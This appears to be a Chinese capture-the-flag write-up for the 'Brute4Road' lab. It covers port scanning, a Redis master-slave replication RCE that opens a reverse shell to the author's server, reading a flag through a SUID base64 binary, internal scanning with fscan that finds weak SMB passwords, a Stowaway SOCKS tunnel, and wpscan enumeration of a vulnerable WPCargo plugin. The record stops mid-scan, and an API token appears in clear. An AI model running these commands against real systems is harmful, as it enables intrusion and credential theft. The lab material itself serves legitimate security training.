春秋云境-Brute4Road

漫山遍野你的脸庞 唯有遗忘是最漫长

---

靶机ip：39.98.109.138

难度：中等

涉及内容：

外网信息收集与端口扫描（RustScan / Nmap）

Redis 未授权访问与主从复制 RCE（针对 5.0.x 版本）

Linux 基础命令绕过（Base64 读取敏感文件）

内网代理搭建与流量转发（Stowaway / Proxychains4）

内网资产发现与漏洞扫描（fscan）

Web 漏洞利用（WordPress WPCargo 插件 CVE-2021-25003 远程代码执行）

数据库凭证窃取与信息泄漏利用（提取密码字典）

服务暴力破解（Hydra 爆破 MSSQL）

Windows 本地提权（GodPotato 滥用 DCOM/RPC 机制提权至 SYSTEM）

Windows 凭证转储（Mimikatz 提取机器账户 NTLM Hash）

Active Directory 域环境枚举（SharpHound / BloodHound）

域内权限提升：Kerberos 约束委派攻击（利用 Rubeus 进行 S4U2Self 和 S4U2Proxy 攻击获取域管权限）

---

端口扫描

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 39.98.109.138
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 39.98.109.138:21
Open 39.98.109.138:22
Open 39.98.109.138:80
Open 39.98.109.138:6379

开放6379端口

那么redis服务开放，尝试利用redis主从复制rce

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 39.98.109.138 -- -A -T4 -sC -sV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where scanning meets swagging. 😎

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 39.98.109.138:22
Open 39.98.109.138:21
Open 39.98.109.138:80
Open 39.98.109.138:6379
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A -T4 -sC -sV" on ip 39.98.109.138
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-20 02:20 -0500
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:20
Completed NSE at 02:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:20
Completed NSE at 02:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:20
Completed NSE at 02:20, 0.00s elapsed
Initiating Ping Scan at 02:20
Scanning 39.98.109.138 [4 ports]
Completed Ping Scan at 02:20, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:20
Completed Parallel DNS resolution of 1 host. at 02:20, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 02:20
Scanning 39.98.109.138 [4 ports]
Discovered open port 80/tcp on 39.98.109.138
Discovered open port 22/tcp on 39.98.109.138
Discovered open port 21/tcp on 39.98.109.138
Discovered open port 6379/tcp on 39.98.109.138
Completed SYN Stealth Scan at 02:20, 0.07s elapsed (4 total ports)
Initiating Service scan at 02:20
Scanning 4 services on 39.98.109.138
Completed Service scan at 02:21, 6.08s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 39.98.109.138
Initiating Traceroute at 02:21
Completed Traceroute at 02:21, 0.02s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 02:21
Completed Parallel DNS resolution of 2 hosts. at 02:21, 1.00s elapsed
DNS resolution of 2 IPs took 1.00s. Mode: Async [#: 1, OK: 0, NX: 2, DR: 0, SF: 0, TR: 2, CN: 0]
NSE: Script scanning 39.98.109.138.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:21
Completed NSE at 02:21, 5.13s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:21
Completed NSE at 02:21, 0.52s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:21
Completed NSE at 02:21, 0.00s elapsed
Nmap scan report for 39.98.109.138
Host is up, received reset ttl 128 (0.0080s latency).
Scanned at 2026-02-20 02:20:54 EST for 14s

PORT     STATE SERVICE REASON          VERSION
21/tcp   open  ftp     syn-ack ttl 128 vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0            4096 Jun 09  2021 pub
|_ftp-bounce: bounce working!
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:183.213.102.203
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp   open  ssh     syn-ack ttl 128 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 fb:cb:e7:d6:1e:8e:cd:7d:48:39:42:3d:88:0e:fb:20 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDjT/nK9pBxH08NWad9PXNg48U5iALxSc+iKzrTDM8tkH6ukP3CMQjccrO45AOCAOcBr1n5f4KvWw2y16xEwFLvlCCAtHBVno95Zd2XaNS+Pg1NI7tB5Pl2/WDmkS/6I4x3bFJlm2HbDk2m+j+ni3IbZ7XJB0OO7BMNKt/ERYnY0xm73sCaTWDfnxzkjETnYBNnSYvy5p+gRc9LrIJ64tB/wYgPEmeaJbSa457HgK8DqfX9p76EvK7XOQwhDeNjzmOqyz72bQfxDE8WQoyAaqXqfqCxMCY30m9sUYeSlCKAcDxyxgxiB0vh9sRUdthQIJp6MktDxckjJ9/9k84MqLhX
|   256 74:45:51:cd:ac:4f:a7:6d:23:ad:2f:6e:32:20:89:87 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEdmazxL5ogbgZRzKBM545unE663hdQ3v6JTMkLKeEwBn/Z8dvJDkBoJJRrfQX7UXVf6YeyQph6gJBI3miR/7IQ=
|   256 57:31:6f:f8:4d:1a:63:c4:b1:61:a2:d7:37:22:1f:a6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEwudrTip4FSfZwxi0AoNaemAJmQtU07BMDiHpzz66z4
80/tcp   open  http    syn-ack ttl 128 nginx 1.20.1
|_http-title: Welcome to CentOS
|_http-server-header: nginx/1.20.1
| http-methods: 
|_  Supported Methods: GET HEAD
6379/tcp open  redis   syn-ack ttl 128 Redis key-value store 5.0.12
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running: Actiontec embedded, Linux 2.4.X
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4.37
OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37)
TCP/IP fingerprint:
OS:SCAN(V=7.98%E=4%D=2/20%OT=21%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=69980B64%P=x8
OS:6_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=105%TI=I%II=I%SS=S%TS=U)OPS(O1=M5
OS:B4%O2=M5B4%O3=M5B4%O4=M5B4%O5=M5B4%O6=M5B4)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W
OS:4=FAF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=N%TG=80%W=FAF0%O=M5B4%CC=N%Q=)T1(R=Y%D
OS:F=N%TG=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=N%TG=80%W=FAF0%S=O%A=S+
OS:%F=AS%O=M5B4%RD=0%Q=)T4(R=Y%DF=N%TG=80%W=7FFF%S=A%A=Z%F=R%O=%RD=0%Q=)T6(
OS:R=Y%DF=N%TG=80%W=7FFF%S=A%A=Z%F=R%O=%RD=0%Q=)U1(R=N)IE(R=Y%DFI=N%TG=80%C
OS:D=S)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Unix

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.40 ms 192.168.21.2
2   0.36 ms 39.98.109.138

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:21
Completed NSE at 02:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:21
Completed NSE at 02:21, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:21
Completed NSE at 02:21, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds
           Raw packets sent: 46 (3.670KB) | Rcvd: 31 (1.654KB)

其后的细节探查证明redis是5.x版本，4.x的直接利用不可行，在此之前先看一下ftp的资源

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ftp 39.98.109.138
Connected to 39.98.109.138.
220 (vsFTPd 3.0.2)
Name (39.98.109.138:kali): Anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir -a
229 Entering Extended Passive Mode (|||26649|).
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Jun 10  2022 .
drwxr-xr-x    3 0        0            4096 Jun 10  2022 ..
drwxr-xr-x    2 0        0            4096 Jun 09  2021 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> dir -a
229 Entering Extended Passive Mode (|||48094|).
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jun 09  2021 .
drwxr-xr-x    3 0        0            4096 Jun 10  2022 ..
226 Directory send OK.
ftp> 

没东西，那就只能利用redis了。

n0b0dyCN/redis-rogue-server: Redis(<=5.0.5) RCE

root@dkhkdZlNGAAKbnRQBVLf:/opt/redis-rogue-server# python3 redis-rogue-server.py --rhost 39.98.109.138 --lhost xxxxx --lport 21002
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig

[info] TARGET 39.98.109.138:6379
[info] SERVER 38.55.99.145:21002
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: xxxxxx
Reverse server port: 9999
[info] Reverse shell payload sent.
[info] Check at 38.55.99.145:9999
[info] Unload module...

root@dkhkdZlNGAAKbnRQBVLf:~# penelope -p 9999
[!] Emojis disabled 
[+] Listening for reverse shells on 0.0.0.0:9999 →  127.0.0.1 • 38.55.99.145 
➤   Main Menu (m)  Payloads (p)  Clear (Ctrl-L)  Quit (q/Ctrl-C)
[+] Got reverse shell from centos-web01~39.98.127.114-Linux-x86_64  Assigned SessionID <1> 
[+] Attempting to upgrade shell to PTY... 
[+] Shell upgraded successfully using /usr/bin/python3!  
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12  
[+] Logging to /root/.penelope/sessions/centos-web01~39.98.127.114-Linux-x86_64/2026_02_20-15_55_10-647.log  
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── 
[redis@centos-web01 db]$ 

[redis@centos-web01 db]$ find / -perm -4000 2>/dev/null
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/unix_chkpwd
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/base64
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/crontab
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/pkexec
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1
[redis@centos-web01 db]$ 

有base64，那直接读flag就行

[redis@centos-web01 db]$ cd /home
[redis@centos-web01 home]$ ls
redis
[redis@centos-web01 home]$ cd redis/
[redis@centos-web01 redis]$ ls
flag  redis-5.0.12
[redis@centos-web01 redis]$ cat flag/
cat: flag/: Is a directory
[redis@centos-web01 redis]$ cd flag/
[redis@centos-web01 flag]$ ls
flag01
[redis@centos-web01 flag]$ cat flag01 
cat: flag01: Permission denied
[redis@centos-web01 flag]$ 

[redis@centos-web01 flag]$ /usr/bin/base64 /home/redis/flag/flag01 | base64 --decode
 ██████                    ██              ██  ███████                           ██
░█░░░░██                  ░██             █░█ ░██░░░░██                         ░██
░█   ░██  ██████ ██   ██ ██████  █████   █ ░█ ░██   ░██   ██████   ██████       ░██
░██████  ░░██░░█░██  ░██░░░██░  ██░░░██ ██████░███████   ██░░░░██ ░░░░░░██   ██████
░█░░░░ ██ ░██ ░ ░██  ░██  ░██  ░███████░░░░░█ ░██░░░██  ░██   ░██  ███████  ██░░░██
░█    ░██ ░██   ░██  ░██  ░██  ░██░░░░     ░█ ░██  ░░██ ░██   ░██ ██░░░░██ ░██  ░██
░███████ ░███   ░░██████  ░░██ ░░██████    ░█ ░██   ░░██░░██████ ░░████████░░██████
░░░░░░░  ░░░     ░░░░░░    ░░   ░░░░░░     ░  ░░     ░░  ░░░░░░   ░░░░░░░░  ░░░░░░ 


flag01: flag{f8c50939-94c5-4106-a3ec-7aeab08e0948}

Congratulations! ! !
Guess where is the second flag?
[redis@centos-web01 flag]$ 

上传fscan和stowaway作代理(靶机居然自带了wget，我哭死)

[redis@centos-web01 redis]$ hostname -i
172.22.2.7

用fscan扫描整个网段

[redis@centos-web01 tmp]$ ./fscan -h 172.22.2.0/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2026-02-20 16:20:13] [INFO] 暴力破解线程数: 1
[2026-02-20 16:20:13] [INFO] 开始信息扫描
[2026-02-20 16:20:13] [INFO] CIDR范围: 172.22.2.0-172.22.2.255
[2026-02-20 16:20:13] [INFO] 生成IP范围: 172.22.2.0.%!d(string=172.22.2.255) - %!s(MISSING).%!d(MISSING)
[2026-02-20 16:20:13] [INFO] 解析CIDR 172.22.2.0/24 -> IP范围 172.22.2.0-172.22.2.255
[2026-02-20 16:20:13] [INFO] 最终有效主机数量: 256
[2026-02-20 16:20:13] [INFO] 开始主机扫描
[2026-02-20 16:20:13] [INFO] 正在尝试无监听ICMP探测...
[2026-02-20 16:20:13] [INFO] 当前用户权限不足,无法发送ICMP包
[2026-02-20 16:20:13] [INFO] 切换为PING方式探测...
[2026-02-20 16:20:13] [SUCCESS] 目标 172.22.2.3      存活 (ICMP)
[2026-02-20 16:20:13] [SUCCESS] 目标 172.22.2.7      存活 (ICMP)
[2026-02-20 16:20:14] [SUCCESS] 目标 172.22.2.16     存活 (ICMP)
[2026-02-20 16:20:14] [SUCCESS] 目标 172.22.2.18     存活 (ICMP)
[2026-02-20 16:20:14] [SUCCESS] 目标 172.22.2.34     存活 (ICMP)
[2026-02-20 16:20:19] [INFO] 存活主机数量: 5
[2026-02-20 16:20:19] [INFO] 有效端口数量: 233
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.18:22
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.7:80
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.7:22
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.7:21
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.3:389
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.34:139
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.18:139
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.34:135
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.3:139
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.16:139
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.16:135
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.3:135
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.18:445
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.16:445
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.3:445
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.34:445
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.3:88
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.18:80
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.16:80
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.16:1433
[2026-02-20 16:20:20] [SUCCESS] 端口开放 172.22.2.7:6379
[2026-02-20 16:20:20] [SUCCESS] 服务识别 172.22.2.18:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2026-02-20 16:20:20] [SUCCESS] 服务识别 172.22.2.7:22 => [ssh] 版本:7.4 产品:OpenSSH 信息:protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.4.]
[2026-02-20 16:20:20] [SUCCESS] 服务识别 172.22.2.7:21 => [ftp] 版本:3.0.2 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.2).]
[2026-02-20 16:20:25] [SUCCESS] 服务识别 172.22.2.7:80 => [http] 版本:1.20.1 产品:nginx
[2026-02-20 16:20:25] [SUCCESS] 服务识别 172.22.2.3:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2026-02-20 16:20:25] [SUCCESS] 服务识别 172.22.2.34:139 =>  Banner:[.]
[2026-02-20 16:20:25] [SUCCESS] 服务识别 172.22.2.3:139 =>  Banner:[.]
[2026-02-20 16:20:25] [SUCCESS] 服务识别 172.22.2.16:139 =>  Banner:[.]
[2026-02-20 16:20:25] [SUCCESS] 服务识别 172.22.2.16:445 => 
[2026-02-20 16:20:25] [SUCCESS] 服务识别 172.22.2.3:445 => 
[2026-02-20 16:20:25] [SUCCESS] 服务识别 172.22.2.34:445 => 
[2026-02-20 16:20:25] [SUCCESS] 服务识别 172.22.2.3:88 => 
[2026-02-20 16:20:26] [SUCCESS] 服务识别 172.22.2.16:80 => [http] 版本:2.0 产品:Microsoft HTTPAPI httpd 系统:Windows
[2026-02-20 16:20:26] [SUCCESS] 服务识别 172.22.2.16:1433 => [ms-sql-s] 版本:13.00.4001; SP1 产品:Microsoft SQL Server 2016 系统:Windows Banner:[.%.]
[2026-02-20 16:20:28] [SUCCESS] 服务识别 172.22.2.18:80 => [http]
[2026-02-20 16:21:20] [SUCCESS] 服务识别 172.22.2.18:139 => 
[2026-02-20 16:21:20] [SUCCESS] 服务识别 172.22.2.18:445 => 
[2026-02-20 16:21:21] [SUCCESS] 服务识别 172.22.2.7:6379 => 
[2026-02-20 16:21:25] [SUCCESS] 服务识别 172.22.2.34:135 => 
[2026-02-20 16:21:25] [SUCCESS] 服务识别 172.22.2.16:135 => 
[2026-02-20 16:21:25] [SUCCESS] 服务识别 172.22.2.3:135 => 
[2026-02-20 16:21:25] [INFO] 存活端口数量: 21
[2026-02-20 16:21:25] [INFO] 开始漏洞扫描
[2026-02-20 16:21:25] [INFO] 加载的插件: findnet, ftp, ldap, ms17010, mssql, netbios, redis, smb, smb2, smbghost, ssh, webpoc, webtitle
[2026-02-20 16:21:25] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.3
主机名: DC
发现的网络接口:
   IPv4地址:
      └─ 172.22.2.3
[2026-02-20 16:21:25] [SUCCESS] 网站标题 http://172.22.2.16        状态码:404 长度:315    标题:Not Found
[2026-02-20 16:21:25] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.16
主机名: MSSQLSERVER
发现的网络接口:
   IPv4地址:
      └─ 172.22.2.16
[2026-02-20 16:21:25] [SUCCESS] NetBios 172.22.2.34     XIAORANG\CLIENT01             
[2026-02-20 16:21:25] [SUCCESS] 网站标题 http://172.22.2.7         状态码:200 长度:4833   标题:Welcome to CentOS
[2026-02-20 16:21:25] [INFO] 系统信息 172.22.2.16 [Windows Server 2016 Datacenter 14393]
[2026-02-20 16:21:25] [INFO] 系统信息 172.22.2.3 [Windows Server 2016 Datacenter 14393]
[2026-02-20 16:21:25] [SUCCESS] NetBios 172.22.2.3      DC:DC.xiaorang.lab               Windows Server 2016 Datacenter 14393
[2026-02-20 16:21:25] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.34
主机名: CLIENT01
发现的网络接口:
   IPv4地址:
      └─ 172.22.2.34
[2026-02-20 16:21:25] [SUCCESS] NetBios 172.22.2.16     MSSQLSERVER.xiaorang.lab            Windows Server 2016 Datacenter 14393
[2026-02-20 16:21:25] [SUCCESS] 匿名登录成功!
[2026-02-20 16:21:25] [SUCCESS] 172.22.2.34 CVE-2020-0796 SmbGhost Vulnerable
[2026-02-20 16:21:25] [SUCCESS] NetBios 172.22.2.18     WORKGROUP\UBUNTU-WEB02        
[2026-02-20 16:21:25] [SUCCESS] SMB认证成功 172.22.2.18:445 administrator:123456
[2026-02-20 16:21:25] [INFO] SMB2共享信息 172.22.2.18:445 administrator Pass:123456 共享:[print$ IPC$]
[2026-02-20 16:21:26] [SUCCESS] 网站标题 http://172.22.2.18        状态码:200 长度:57738  标题:又一个WordPress站点
[2026-02-20 16:21:27] [INFO] SMB2共享信息 172.22.2.16:445 admin Pass:123456 共享:[ADMIN$ C$ fileshare IPC$]
[2026-02-20 16:21:33] [SUCCESS] SMB认证成功 172.22.2.16:445 admin:123456

1. 核心域控 (Domain Controller)
IP地址: 172.22.2.3
主机名: DC
域名: xiaorang.lab
操作系统: Windows Server 2016 Datacenter 14393
开放关键服务: 88 (Kerberos), 135 (RPC), 139 (NetBIOS), 389 (LDAP), 445 (SMB)
备注: 域环境的核心，你的最终目标。
2. 数据库服务器
IP地址: 172.22.2.16
主机名: MSSQLSERVER
域名: xiaorang.lab (已加域)
操作系统: Windows Server 2016 Datacenter 14393
开放关键服务: 80 (HTTPAPI), 135, 139, 445 (SMB), 1433 (MSSQL 2016 SP1)
🔥 高危漏洞/凭证: * SMB 弱口令: 爆破成功 admin:123456
共享目录泄露: 存在共享目录 fileshare
3. 个人客户端机
IP地址: 172.22.2.34
主机名: CLIENT01
域名: XIAORANG (属于该域)
开放关键服务: 135, 139, 445 (SMB)
🔥 高危漏洞: * CVE-2020-0796 (SMBGhost): 这是一个非常著名的 RCE/LPE 漏洞，甚至可能导致蓝屏。
4. 第二台 Web 服务器
IP地址: 172.22.2.18
主机名: UBUNTU-WEB02
工作组: WORKGROUP (未加域)
操作系统: Ubuntu Linux
开放关键服务: 22 (SSH), 80 (HTTP), 139, 445 (SMB)
🔥 高危漏洞/凭证:
HTTP 服务: 运行着 WordPress 站点
SMB 弱口令: 爆破成功 administrator:123456

上传stowaway搭建内网隧道

root@dkhkdZlNGAAKbnRQBVLf:/opt/stowaway# ./linux_x64_admin -l 7777 -s 123456

[redis@centos-web01 tmp]$ ./agent -c xxxxxx:7777 -s 123456
2026/02/20 16:31:54 [*] Starting agent node actively.Connecting to xxxxxx:7777

[*] Waiting for new connection...
[*] Connection from node 39.98.109.138:42532 is set up successfully! Node id is 0
(admin) >> use 0
(node 0) >> socks 8888
[*] Trying to listen on 0.0.0.0:8888......
[*] Waiting for agent's response......
[*] Socks start successfully!
(node 0) >> 

配置proxychains4走vps代理访问内网。

先打那个wordpress站点。

curl一下试试，成功访问。

┌──(root㉿kaada)-[/opt/redis-rogue-server]
└─# proxychains4 curl 172.22.2.18                                                        
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
<html lang="zh-CN">
<head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1" />
<meta name='robots' content='max-image-preview:large' />
<title>又一个WordPress站点</title>
<link rel='dns-prefetch' href='//s.w.org' />

用wpscan扫一下

┌──(root㉿kaada)-[/opt/redis-rogue-server]
└─# proxychains4 wpscan --url http://172.22.2.18/ --api-token ubwyNS1LifabZUN2ynH0C81mBSXXURNouWNADOf0v4U

[+] wpcargo
 | Location: http://172.22.2.18/wp-content/plugins/wpcargo/
 | Last Updated: 2025-07-23T01:11:00.000Z
 | [!] The version is out of date, the latest version is 8.0.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 6 vulnerabilities identified:
 |
 | [!] Title: WPCargo < 6.9.0 - Unauthenticated RCE
 |     Fixed in: 6.9.0
 |     References:
 |      - https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25003
 |
 | [!] Title: WPCargo Track & Trace < 6.9.5 - Reflected Cross Site Scripting
 |     Fixed in: 6.9.5
 |     References:
 |      - https://wpscan.com/vulnerability/d5c6f894-6ad1-46f4-bd77-17ad9234cfc3
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1436
 |
 | [!] Title: WPCargo Track & Trace < 6.9.5 - Admin+ Stored Cross Site Scripting
 |     Fixed in: 6.9.5
 |     References:
 |      - https://wpscan.com/vulnerability/ef5aa8a7-23a7-4ce0-bb09-d9c986386114
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1435
 |
 | [!] Title: WPCargo Track & Trace <= 8.0.2 - Unauthenticated SQL Injection
 |     References:
 |      - https://wpscan.com/vulnerability/f5fdb762-cbc1-4352-9ab2-cbba9d3d33e2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44004
 |      - https://patchstack.com/database/wordpress/plugin/wpcargo/vulnerability/wordpress-wpcargo-track-trace-plugin-7-0-6-sql-injection-vulnerability
 |
 | [!] Title: WPCargo Track & Trace <= 8.0.2 - Subscriber+ Settings Update
 |     References:
 |      - https://wpscan.com/vulnerability/b433fff9-b501-4fb3-9f04-5e18b64b0a90
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-54271
 |      - https://patchstack.com/database/wordpress/plugin/wpcargo/vulnerability/wordpress-wpcargo-track-trace-plugin-7-0-6-settings-change-vulnerability
 |
 | [!] Title: WPCargo Track & Trace <= 8.0.2 - Contributor+ Insecure Direct Object Reference
 |     References:
 |      - https://wpscan.com/vulnerability/594ae221-06b6-4bc2-b5b6-0f9bac880f7b
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31609
 |      - https://patchstack.com/database/wordpress/plugin/wpcargo/vulnerability/wordpress-wpcargo-track-trace-plugin-7-0-6-insecure-direct-object-references-idor-vulnerability
 |
 | Version: 6.x.x (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://172.22.2.18/wp-content/plugins/wpcargo/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.2.18:80  ...  OK                                          > (0 / 137)  0.00%  ETA: ??:??:??
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.2.18:80  ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.2.18:80  ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.2.18:80  ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.2.18:80  ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.2.18:80  ...  OK                                         > (16 / 137) 11.67%  ETA: 00:00:30
